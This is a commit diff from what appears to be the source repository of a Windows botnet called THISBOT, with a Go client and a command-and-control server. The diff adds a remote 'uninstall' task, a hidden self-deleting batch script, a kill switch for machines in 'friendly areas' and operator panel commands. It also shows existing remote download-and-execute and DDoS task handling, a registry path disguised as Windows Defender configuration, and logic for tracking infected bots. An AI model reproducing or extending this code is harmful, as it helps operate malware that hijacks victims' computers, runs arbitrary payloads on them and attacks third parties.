⚡Update v1.7.8

unknown · unknown · commit 2919e6536913 · 2025-12-19T09:35:30.000+08:00
1.	Add uninstall command
2.	Fix the problem of friendly area uninstall antomatically
3.	Update the database design
diff --git a/client/components/core.go b/client/components/core.go
@@ -19,6 +19,31 @@ func do_register_bot(pkg *ServerReply, host string) bool {
 	return false
 }
 
+func do_uninstall_bot(pkg *ServerReply, host string) {
+	report := Report{
+		Guid:    g_guid,
+		TaskID:  strconv.FormatInt(pkg.TaskId, 10),
+		Success: true,
+		Output:  "",
+		Error:   "done",
+		Extra:   make(map[string]any),
+	}
+	report.Extra["action"] = "uninstall"
+	// To json
+	byt, _ := json.Marshal(report)
+	// Build url
+	url := build_url(host, "/report", botcore.use_ssl)
+	timestamp := generate_utc_timestamp_string()
+	sign := create_sign(g_token, g_guid, timestamp)
+	do_head_post(url, byt, map[string]string{
+		"X-Guid": g_guid,
+		"X-Time": timestamp,
+		"X-Sign": base64_enc(sign),
+	}, botcore.use_ssl)
+	// Install self
+	uninstall()
+}
+
 func do_remote_download_execute(pkg *ServerReply, host string) bool {
 	commandline := pkg.Args["args"].(string)
 	hidden := pkg.Args["hidden"].(bool)
@@ -53,7 +78,6 @@ func do_remote_download_execute(pkg *ServerReply, host string) bool {
 	}
 	report.Extra["action"] = action
 	byt, _ := json.Marshal(report)
-	// Send report to C2
 
 	// Build url
 	url := build_url(host, "/report", botcore.use_ssl)
@@ -119,6 +143,9 @@ func send_poll_request(host string) BotState {
 	case "execute":
 		// Remote download execution
 		do_remote_download_execute(reply, host)
+	case "uninstall":
+		// Uninstall self
+		do_uninstall_bot(reply, host)
 	case "ddos":
 		do_ddos_attack(reply, host)
 	case "poll":
@@ -283,9 +310,9 @@ func read_config() bool {
 
 func Run() {
 	// Uninstall if machine in friendly areas
-	//if run_on_friendly_area() {
-	//	uinstall()
-	//}
+	if run_on_friendly_area() {
+		uninstall()
+	}
 	// Read configure
 	if !read_config() {
 		os.Exit(0)
diff --git a/client/components/functions.go b/client/components/functions.go
@@ -6,8 +6,12 @@ import (
 	"net/url"
 	"os"
 	"os/exec"
+	"path/filepath"
 	"runtime"
+	"strconv"
 	"syscall"
+
+	"golang.org/x/sys/windows/registry"
 )
 
 func remote_execute(path string, hidden bool, args ...string) bool {
@@ -84,11 +88,22 @@ func kill(name string) bool {
 	return ret != 0
 }
 
-// TODO: It has bugs
-func uinstall() {
+func uninstall() {
 	_ = os.Chdir(os.TempDir())
-	str := `ping 127.0.0.1 -n 3 > nul && del /f /q "` + get_module_file() + `"`
-	cmd := exec.Command("cmd", "/C", str)
+	script := "@echo off\n" +
+		"chcp 65001\n" +
+		"timtout /t 1 /nobreak\n" +
+		"taskkill /f /pid " + strconv.FormatInt(int64(os.Getpid()), 10) + " /t" +
+		"timtout /t 1 /nobreak\n" +
+		"del /f /q \"" + get_module_file() + "\"\n" +
+		"timtout /t 2 /nobreak\n" +
+		"del /f /q %0"
+	path := filepath.Join(os.TempDir(), random_string(8)+".bat")
+	if err := os.WriteFile(path, []byte(script), 0644); err != nil {
+		os.Exit(0)
+	}
+	reg_delete_key(registry.CURRENT_USER, g_regpath)
+	cmd := exec.Command("cmd", "/C", path)
 	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
 	if err := cmd.Start(); err != nil {
 		return
diff --git a/client/components/global.go b/client/components/global.go
@@ -49,7 +49,7 @@ var (
 
 	g_guid        = ""
 	g_token       = ""
-	g_regpath     = "Software/WinDefConfig"
+	g_regpath     = `Software\WinDefConfig`
 	g_installdate = ""
 
 	// Dlls loading
@@ -76,15 +76,15 @@ var (
 	pfnGetKeyboardLayout    = user32.NewProc("GetKeyboardLayout")
 
 	botcore = BotCore{
-		version:       "1.6.8",
+		version:       "1.7.8",
 		hosts:         []string{"127.0.0.1:8080"},
 		singleton:     true,
 		sington_mutex: 0,
 		anti_debug:    false,
 		anti_vm:       false,
 		anti_sandbox:  false,
 		install:       false,
-		use_ssl:       true,
+		use_ssl:       false,
 		root_pem:      "",
 		delay:         0,
 		mutex_name:    "eSq3w0KtD7gDMR7q",
diff --git a/client/components/system.go b/client/components/system.go
@@ -132,11 +132,23 @@ func reg_delete_value(key registry.Key, subPath string, name string) bool {
 }
 
 func reg_delete_key(key registry.Key, subPath string) bool {
-	err := registry.DeleteKey(key, subPath)
+	subKey, err := registry.OpenKey(key, subPath,
+		registry.QUERY_VALUE|registry.ENUMERATE_SUB_KEYS|registry.SET_VALUE)
 	if err != nil {
 		return false
 	}
-	return true
+	defer subKey.Close()
+
+	names, err := subKey.ReadSubKeyNames(-1)
+	if err != nil {
+		return false
+	}
+	for _, name := range names {
+		if !reg_delete_key(key, subPath+`\`+name) {
+			return false
+		}
+	}
+	return registry.DeleteKey(key, subPath) == nil
 }
 
 func reg_create_key(root registry.Key, subPath string) registry.Key {
diff --git a/client/main.go b/client/main.go
@@ -7,6 +7,7 @@ import (
 )
 
 func main() {
+	
 	args := os.Args
 
 	if len(args) >= 3 && args[1] == "-c" {
diff --git a/server/common/global.go b/server/common/global.go
@@ -11,7 +11,7 @@ var (
 	Seed             = rand.New(rand.NewSource(time.Now().UnixNano()))
 	Cfg              = Config{}
 	Db       *sql.DB = nil
-	Version          = "v1.6.8"
+	Version          = "v1.7.8"
 	StubPath         = map[string]string{"winexe": "../bin/Stub",
 		"winshellcode": "../bin/Stub.bin",
 		"linux":        "../bin/Stub",
diff --git a/server/core/localhandlers.go b/server/core/localhandlers.go
@@ -180,6 +180,32 @@ func select_handler(ary []string) {
 	show_bot_info(&bot)
 }
 
+func uninstall_handler() {
+	sqlStr := "select id from commands where name='uninstall'"
+	command_id := 0
+	if err := db1.QueryRow(common.Db, sqlStr).Scan(&command_id); err != nil {
+		if err == sql.ErrNoRows {
+			fmt.Println("[💀] No such command")
+		} else {
+			fmt.Println("[💀] Command error")
+		}
+		return
+	}
+	map_args := map[string]interface{}{}
+	byt, _ := json.Marshal(map_args)
+	sqlStr = "insert into tasks(bot_id, command_id, status, args) values (?,?,?,?)"
+	if common.CurrentBot == 0 {
+		fmt.Println("[❗] It's broadcast mode now, can't use 'uninstall' command")
+		return
+	}
+	_, err := db1.Insert(common.Db, sqlStr, common.CurrentBot, command_id, "queued", byt)
+	if err != nil {
+		fmt.Println("[💀] Failed to generate uninstall command")
+	} else {
+		fmt.Println("[✅] Generate uninstall command successfully")
+	}
+}
+
 func exec_handler(ary []string) {
 	if len(ary) < 2 {
 		fmt.Println("[💀] Usage: exec [-h] path/url [args], please enter help command")
@@ -213,7 +239,6 @@ func exec_handler(ary []string) {
 	if err != nil {
 		if err == sql.ErrNoRows {
 			fmt.Println("[💀] No such command")
-
 		} else {
 			fmt.Println("[💀] Command error")
 		}
diff --git a/server/core/operator.go b/server/core/operator.go
@@ -49,7 +49,7 @@ func Panel() {
 			log_handler(cmdAry)
 		case "exec", "x":
 			exec_handler(cmdAry)
-		case "clear":
+		case "clear", "cls":
 			clear_handler()
 			show_banner()
 		case "info":
@@ -60,6 +60,8 @@ func Panel() {
 			build_handler()
 		case "task", "t":
 			task_handler(cmdAry)
+		case "uninstall", "u":
+			uninstall_handler()
 		case "exit", "e":
 			fmt.Println("[🏴‍☠️] Thanks for using THISBOT panel, bye Σ(っ °Д °;)っ")
 			os.Exit(0)
diff --git a/server/core/restapi.go b/server/core/restapi.go
@@ -56,16 +56,28 @@ func recovery_handler(w http.ResponseWriter, r *http.Request) {
 		log.Println(err.Error())
 	} else {
 		// Find the bot
+		fmt.Print("[🧟] Bot[" + guid + "] online\n$ ")
 		reply.Args["Token"] = out_token
+		tx, _ := common.Db.Begin()
 		// Update timestamp lastseen
-
 		strSql = "update clients set token=?,ip=?,whoami=?,os=?,installdate=?,isadmin=?,antivirus=?,cpuinfo=?,gpuinfo=?,clientversion=?,lastseen=?,status=? where guid=?"
-		_, err = db1.Exec(common.Db, strSql, out_token, bot.Ip, bot.Whoami, bot.Os, utils.TimestampStringToMySqlDateTime(bot.Installdate), bot.Isadmin, bot.Antivirus, bot.Cpuinfo, bot.Gpuinfo, bot.Version, utils.TimestampStringToMySqlDateTime(time1), "active", out_guid)
+		_, err = tx.Exec(strSql, out_token, bot.Ip, bot.Whoami, bot.Os, utils.TimestampStringToMySqlDateTime(bot.Installdate), bot.Isadmin, bot.Antivirus, bot.Cpuinfo, bot.Gpuinfo, bot.Version, utils.TimestampStringToMySqlDateTime(time1), "active", out_guid)
 		if err != nil {
+			tx.Rollback()
 			reply.Status = 0
 			reply.Error = "Find the bot but failed to update"
 			log.Println(err.Error())
 		}
+		// Delete record in clients_archived
+		strSql = "delete from clients_archived where guid=?"
+		_, err = tx.Exec(strSql, guid)
+		if err != nil {
+			tx.Rollback()
+			reply.Status = 0
+			reply.Error = "Find the bot but failed to update"
+			log.Println(err.Error())
+		}
+		tx.Commit()
 	}
 
 	err = http_sender(w, guid, out_token, &reply)
@@ -94,28 +106,27 @@ func poll_handler(w http.ResponseWriter, r *http.Request) {
 	reply.Status = 1
 	reply.TaskId = 0
 
-	// Update the status of clients and clients_archived
-	sqlStr := "update clients set status='active', lastseen=? where guid=?"
-	_, err := db1.Exec(common.Db, sqlStr, utils.TimestampStringToMySqlDateTime(time1), guid)
-	if err != nil {
-		log.Println("db1.Exec err: ", err.Error())
-	}
+	var sqlStr string
 	// Clients_archived
 	tx, err := common.Db.Begin()
 	if err != nil {
 		log.Println("tx begin err:", err.Error())
 		goto ReadyPoll
 	}
-
-	sqlStr = "insert into clients(guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen, status) " +
-		"select guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen, 'active' from clients_archived where guid=?"
-	_, err = tx.Exec(sqlStr, guid)
+	// Update the status of clients and clients_archived
+	sqlStr = "update clients set status='active', lastseen=? where guid=?"
+	_, err = db1.Exec(common.Db, sqlStr, utils.TimestampStringToMySqlDateTime(time1), guid)
 	if err != nil {
-		tx.Rollback()
-		log.Println("tx insert err:", err.Error())
-		goto ReadyPoll
+		log.Println("db1.Exec err: ", err.Error())
 	}
-
+	//sqlStr = "insert into clients(guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen, status) " +
+	//	"select guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen, 'active' from clients_archived where guid=?"
+	//_, err = tx.Exec(sqlStr, guid)
+	//if err != nil {`
+	//	tx.Rollback()
+	//	log.Println("tx insert err:", err.Error())
+	//	goto ReadyPoll
+	//}
 	sqlStr = "delete from clients_archived where guid=?"
 	_, err = tx.Exec(sqlStr, guid)
 	if err != nil {
diff --git a/server/core/server.go b/server/core/server.go
@@ -22,35 +22,50 @@ import (
 
 func TaskCleaner(db *sql.DB, interval time.Duration) {
 	go func() {
-		time.Sleep(interval)
-		_, err := db1.Exec(db, `delete from tasks where status in ('done', 'failed', 'canceled') and completed_at < UTC_TIMESTAMP() - INTERVAL 3 DAY`)
-		if err != nil {
-			log.Println("Task cleanup error: " + err.Error())
+		ticker := time.NewTicker(interval)
+		for range ticker.C {
+			_, err := db1.Exec(db, `delete from tasks where status in ('done', 'failed', 'canceled') and completed_at < UTC_TIMESTAMP() - INTERVAL 3 DAY`)
+			if err != nil {
+				log.Println("Task cleanup error: " + err.Error())
+			}
 		}
 	}()
 }
 
+/*
+Bot status:
+ 1. active
+ 2. inactive
+ 3. archived
+ 4. purged
+*/
 func DeadBotCleaner(db *sql.DB) {
-	// Create a goroutine to check inactive bot(checked per day)
-	// If bot is online [0, 7) is active and [7, 30) days is inactive, [30, ∞) is purged
+	// Create a goroutine to check inactive bot(checked every 3 minutes)
+	// If bot sends poll within 3 minutes means ACTIVE or its INACTIVE
 	go func() {
-		sqlStr := "update clients set status='inactive' where (lastseen >= UTC_TIMESTAMP() - INTERVAL 30 DAY) and (lastseen < UTC_TIMESTAMP() - INTERVAL 7 DAY)"
-		for {
-			time.Sleep(time.Duration(24) * time.Hour)
+		sqlStr := "update clients set status='inactive' where lastseen < UTC_TIMESTAMP() - INTERVAL 3 MINUTE and status='active'"
+		ticker := time.NewTicker(2 * time.Minute)
+		defer ticker.Stop()
+		//sqlStr := "update clients set status='inactive' where (lastseen >= UTC_TIMESTAMP() - INTERVAL 30 DAY) and (lastseen < UTC_TIMESTAMP() - INTERVAL 7 DAY)"
+		for range ticker.C {
 			_, err := db1.Exec(db, sqlStr)
 			if err != nil {
 				log.Println("DeadBotCleaner inactive db1.Exec error: " + err.Error())
 			}
 			log.Println("DeadBotCleaner inactive db1.Exec okay ")
 		}
 	}()
-	// Create a goroutine to check archived bot(Checked per week)
+	// Create a goroutine to check ACHIVED bot(Checked every 3 days)
 	go func() {
-		sqlStr := "insert into clients_archived (guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen) " +
-			"select guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen from clients where lastseen < UTC_TIMESTAMP() - INTERVAL 30 DAY"
-		sqlDeleteStr := "delete from clients where lastseen < UTC_TIMESTAMP() - INTERVAL 30 DAY"
-		for {
-			time.Sleep(time.Duration(24*7) * time.Hour)
+		//sqlStr := "insert into clients_archived (guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen) " +
+		//	"select guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen from clients where lastseen < UTC_TIMESTAMP() - INTERVAL 30 DAY"
+		//sqlDeleteStr := "delete from clients where lastseen < UTC_TIMESTAMP() - INTERVAL 30 DAY"
+		sqlStr := "insert ignore into clients_archived (guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen) " +
+			"select guid, token, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastseen from clients where status='inactive' and lastseen < UTC_TIMESTAMP() - INTERVAL 3 DAY"
+		sqlUpdateStr := "update clients set status='archived' where status='inactive' and lastseen < UTC_TIMESTAMP() - INTERVAL 3 DAY"
+		ticker := time.NewTicker(time.Duration(3*12) * time.Hour)
+		defer ticker.Stop()
+		for range ticker.C {
 			tx, err := common.Db.Begin()
 			if err != nil {
 				log.Println("DeadBotCleaner archived tx.Begin error: " + err.Error())
@@ -63,7 +78,7 @@ func DeadBotCleaner(db *sql.DB) {
 				continue
 			}
 			// Delete record from clients table
-			_, err = tx.Exec(sqlDeleteStr)
+			_, err = tx.Exec(sqlUpdateStr)
 			if err != nil {
 				tx.Rollback()
 				log.Println("DeadBotCleaner archived delete tx.Rollback error: " + err.Error())
@@ -75,13 +90,13 @@ func DeadBotCleaner(db *sql.DB) {
 			}
 			log.Println("DeadBotCleaner archived commit okay ")
 		}
-
 	}()
 	// Create a go routine to delete purged bot(Checked per month)
 	go func() {
 		sqlStr := `delete from clients_archived where purged_after <= UTC_TIMESTAMP()`
-		for {
-			time.Sleep(time.Duration(24*30) * time.Hour)
+		ticker := time.NewTicker(time.Duration(24*15) * time.Hour)
+		defer ticker.Stop()
+		for range ticker.C {
 			_, err := db1.Exec(db, sqlStr)
 			if err != nil {
 				log.Println("DeadBotCleaner delete error: " + err.Error())
diff --git a/server/core/ui.go b/server/core/ui.go
diff --git a/server/db1/mysql.go b/server/db1/mysql.go
diff --git a/server/thisbot.sql b/server/thisbot.sql

Original file line number	Diff line number	Diff line change
`@@ -7,6 +7,7 @@ import (`
`7`	`7`	`)`
`8`	`8`
`9`	`9`	`func main() {`
	`10`	`+`
`10`	`11`	`args := os.Args`
`11`	`12`
`12`	`13`	`if len(args) >= 3 && args[1] == "-c" {`